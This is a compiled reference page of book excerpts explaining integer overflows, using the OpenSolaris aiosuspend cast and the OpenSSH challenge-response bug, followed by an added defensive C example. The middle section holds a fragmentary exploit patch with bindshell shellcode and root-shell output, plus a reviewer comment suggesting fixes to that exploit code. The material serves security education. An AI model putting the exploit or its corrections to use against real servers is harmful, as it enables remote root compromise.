Security through Emulation-Based Processor Diversification
Juan Carlos Ruiz, in Emerging Trends in ICT Security, 2014

Memory errors

Memory errors usually derive from the exploitation of vulnerabilities (depicted as holes in a wall in Figure 21.1) existing in a given application due to software faults introduced during the software's implementation. The most common software faults leading to memory errors are off-by-one, integer, and buffer overflows.

(Arithmetic) Integer Overflows
Enrico Perla, Massimiliano Oldani, in A Guide to Kernel Exploitation, 2011

An integer overflow occurs when you attempt to store inside an integer variable a value that is larger than the maximum value the variable can hold. For signed integers the C standard defines this situation as undefined behavior (meaning that anything might happen); for unsigned integers the standard defines the result as wrapping modulo 2^N, N being the width of the type. In practice, an overflow therefore translates to a wrap of the value if an unsigned integer was used and, on common compilers and hardware, a change of the sign and value if a signed integer was used. Integer overflows are the consequence of "wild" increments/multiplications, generally due to a lack of validation of the variables involved. As an example, take a look at the following code (taken from a vulnerable path that affected the OpenSolaris kernel[6]; the code is condensed here to improve readability):

    kaioc(long a0, long a1, long a2, long a3, long a4, long a5)
        error = aiosuspend((void *)a1, (int)a2, (timespec_t *)a3,

    aiosuspend(void *aiocb, int nent, struct timespec *timout, int flag, long *rval, int run_mode)

Note that the syscall argument a2, a long, is cast to int to become the nent parameter of aiosuspend.

OpenSSH challenge-response vulnerability

    3 response = xmalloc(nresp * sizeof(char*));

An attacker has the ability to change the value of nresp (line 1) by modifying the code in the OpenSSH client. By modifying this value, one can change the amount of memory allocated by xmalloc (line 3). Specifying a large number for nresp, such as 0x40000400, prompts an integer overflow (on a 32-bit build, 0x40000400 * 4 = 0x100001000, which wraps to 0x1000), causing xmalloc to allocate only 4096 bytes of memory. OpenSSH then proceeds to place values into the allocated pointer array (lines 4 through 6), dictated by the value of nresp (line 4), causing heap space to be overwritten with arbitrary data.

Exploitation details

Exploitation of this vulnerability is quite trivial. OpenSSH uses a multitude of function pointers for cleanup functions, and all of these function pointers call code that is on the heap. Example output from sshd running in debug mode (sshd -ddd):

    debug1: auth2_challenge_start: trying authentication method 'bsdauth'
    Postponed keyboard-interactive for test from 127.0.0.1 port 19170 ssh2
    buffer_get: trying to get more bytes 4 than in buffer 0
    debug1: Calling cleanup 0x62000(0x0)

By placing shellcode at one of these addresses, you can cause code execution, yielding remote root access. We can therefore cause arbitrary code execution by placing shellcode at the heap address 0x62000. This is trivial to accomplish and is performed by populating the heap space and copying assembly instructions directly. The exploit sets the value of the nresp variable to 0x40000400, causing malloc to allocate 4096 bytes of memory, while the loop continues to copy data past the allocated buffer onto the heap space. OpenSSH uses many function pointers that are found on the heap following the allocated buffer, so the exploit then proceeds to copy the shellcode directly onto the heap in hopes that it will be executed by the SSH cleanup functions, which is the case most of the time.

Here is a full exploitation example using a modified ssh client containing exploit code (the listing is fragmentary here; the numbers are those of the original listing):

      1 1. Apply the patch provided below by running:
      7 ~/openssh-3.
     15 ~/openssh-3.2.2p1 $ ./configure & make ssh
        If the sploit worked, you can connect to port 128 in another terminal:
     23 uid=0(root) gid=0(wheel) groups=0(wheel)
     25 --- sshconnect2.c Sun Mar 31 20:49:39 2002
     26 +++ evil-sshconnect2.c Fri Jun 28 19:22:12 2002
     29  * parse INFO_REQUEST, prompt user and send INFO_RESPONSE
     32 +int do_syscall( int nb_args, int syscall_num.
     38 +    char rootshell, *argv, *envp
     40 +    server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 )
     43 +    server_addr.sin_family = AF_INET
     44 +    do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr,
     47 +    client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)
     52 +    *(int *)( rootshell + 0 ) = 0x6E69622F
     53 +    *(int *)( rootshell + 4 ) = 0x0068732f
     58 +    do_syscall( 3, 59, rootshell, argv, envp )
     61 +int do_syscall( int nb_args, int syscall_num. )
        }
     83 input_userauth_info_req(int type, u_int32_t seq, void *ctxt)
     92  * Begin to build info response packet based on prompts requested.
     93  * We commit to providing the correct number of responses, so if
     96     packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE)
    102 +   packet_put_string( shellcode, 2047 )
    106     debug2("input_userauth_info_req: num_prompts %d", num_prompts)
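Review bot: line 38 declares rootshell as a plain char, yet lines 52 and 53 store 4-byte words through (int *)( rootshell + 0 ) and (int *)( rootshell + 4 ); with that declaration rootshell + 0 is arithmetic on a char, not a pointer, so either the declaration should be a buffer of at least 8 bytes (the two words are "/bin" and "/sh\0" in little-endian order, 0x6E69622F and 0x0068732f) or the listing dropped the asterisk. The system-call numbers handed to do_syscall at lines 40, 44, 47 and 58 (97, 104, 30, 59: socket, bind, accept, execve) are BSD numbers and deserve a comment saying so, since the bindshell will not run against a Linux sshd. Line 102 sends exactly 2047 bytes from shellcode with no relation to the buffer's real length; the comment block at lines 92-93 should state the size the shellcode buffer must have.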
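The two integer-overflow cases on this page, OpenSSH's nresp * sizeof(char*) allocation and the signed nent that aiosuspend receives from a cast long, are worked through in the added C example below. It is not code from either book, nor the OpenSSH or OpenSolaris fix; alloc_size_32, checked_mul, signed_count_to_bytes, alloc_responses and the MAX_RESPONSES bound are this example's own names and assumptions. alloc_size_32 reproduces the 32-bit wrap of 0x40000400 * 4 to 4096 bytes regardless of the host's pointer size; checked_mul is the overflow test calloc()/reallocarray() perform; signed_count_to_bytes shows why a negative count must be rejected before it is widened to size_t; alloc_responses is a hardened form of the OpenSSH allocation, bounding the attacker-controlled count as well as checking the multiply (on a 64-bit host the multiply alone would not overflow for 0x40000400, so the bound is what actually stops the request).

```c
/* Added example: undersized allocations from attacker-controlled counts.
 * Not from either book; MAX_RESPONSES and all function names are this
 * example's own choices. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Size requested by the vulnerable pattern
 *     response = xmalloc(nresp * sizeof(char *));
 * on a 32-bit build. Done in uint32_t so the result is the same on any
 * host: unsigned multiply wraps modulo 2^32, so
 * 0x40000400 * 4 = 0x100001000 becomes 0x1000 (4096). */
uint32_t alloc_size_32(uint32_t count, uint32_t elem_size)
{
    return count * elem_size;
}

/* Overflow-checked multiply. Returns 1 and stores the product when
 * count * elem_size fits in size_t; otherwise returns 0 and stores 0. */
int checked_mul(size_t count, size_t elem_size, size_t *out)
{
    if (elem_size != 0 && count > SIZE_MAX / elem_size) {
        *out = 0;
        return 0;
    }
    *out = count * elem_size;
    return 1;
}

/* The kernel case: the count arrives as a signed int (aiosuspend's nent is
 * a long cast to int). A negative value converted to size_t is enormous,
 * so reject it before it reaches the multiply. Returns the byte count, or
 * 0 when nent is unusable. */
size_t signed_count_to_bytes(int nent, size_t elem_size)
{
    size_t bytes;
    if (nent <= 0)
        return 0;
    if (!checked_mul((size_t)nent, elem_size, &bytes))
        return 0;
    return bytes;
}

/* Hardened form of the OpenSSH allocation: bound the count first, then
 * multiply with the overflow check. MAX_RESPONSES is an assumed limit. */
#define MAX_RESPONSES 100

char **alloc_responses(uint32_t nresp)
{
    size_t bytes;
    if (nresp == 0 || nresp > MAX_RESPONSES)
        return NULL;
    if (!checked_mul(nresp, sizeof(char *), &bytes))
        return NULL;
    return malloc(bytes);
}

int main(void)
{
    size_t bytes;
    char **r;

    printf("32-bit xmalloc size for nresp=0x40000400: %u bytes\n",
           (unsigned)alloc_size_32(0x40000400u, 4));
    printf("checked_mul(0x40000400, 4) on this host: %s\n",
           checked_mul(0x40000400u, 4, &bytes) ? "fits" : "overflow");
    printf("signed nent=-1 -> %zu bytes (0 means rejected)\n",
           signed_count_to_bytes(-1, 8));
    r = alloc_responses(0x40000400u);
    printf("alloc_responses(0x40000400) -> %s\n", r ? "allocated" : "rejected");
    free(r);
    return 0;
}
```

The ordering in alloc_responses matters: a plain `nresp > 0` test, which the vulnerable code already had, accepts 0x40000400, and a checked multiply on a 64-bit host also accepts it; only the explicit upper bound on the count rejects a request that the protocol has no reason to permit.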